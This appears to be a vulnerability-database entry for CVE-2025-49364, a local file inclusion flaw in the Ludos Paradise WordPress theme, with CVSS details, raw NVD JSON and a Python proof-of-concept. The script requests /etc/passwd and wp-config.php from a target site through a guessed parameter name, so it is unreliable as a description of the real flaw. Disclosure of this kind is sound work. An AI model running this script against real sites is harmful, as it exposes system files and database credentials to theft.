Security Vulnerability Report
中文
CVE-2025-49364 CVSS 8.1 HIGH

CVE-2025-49364

Published: 2025-12-18 08:15:51
Last Modified: 2026-04-27 20:16:13

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Ludos Paradise ludos-paradise allows PHP Local File Inclusion.This issue affects Ludos Paradise: from n/a through <= 2.1.3.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ludos Paradise <= 2.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-49364 LFI PoC for Ludos Paradise Theme # Target: WordPress site with Ludos Paradise theme <= 2.1.3 def exploit_lfi(target_url, filename='/etc/passwd'): """ Exploit local file inclusion vulnerability """ # Common vulnerable parameters in LFI params = { 'theme_page': filename, # or 'page', 'file', 'template', etc. } print(f'[*] Target: {target_url}') print(f'[*] Attempting to read: {filename}') try: response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: if 'root:' in response.text or 'bin:' in response.text: print('[+] LFI Successful! File contents:') print(response.text[:1000]) else: print('[-] Response received but may not be the target file') else: print(f'[-] Request failed with status: {response.status_code}') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-49364.py <target_url>') print('Example: python cve-2025-49364.py http://victim.com/wp-content/themes/ludos-paradise/') sys.exit(1) target = sys.argv[1] # Test with common sensitive files exploit_lfi(target, '/etc/passwd') exploit_lfi(target, '../../../../wp-config.php')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49364", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:50.643", "lastModified": "2026-04-27T20:16:12.600", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Ludos Paradise ludos-paradise allows PHP Local File Inclusion.This issue affects Ludos Paradise: from n/a through <= 2.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/ludos-paradise/vulnerability/wordpress-ludos-paradise-theme-2-1-3-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}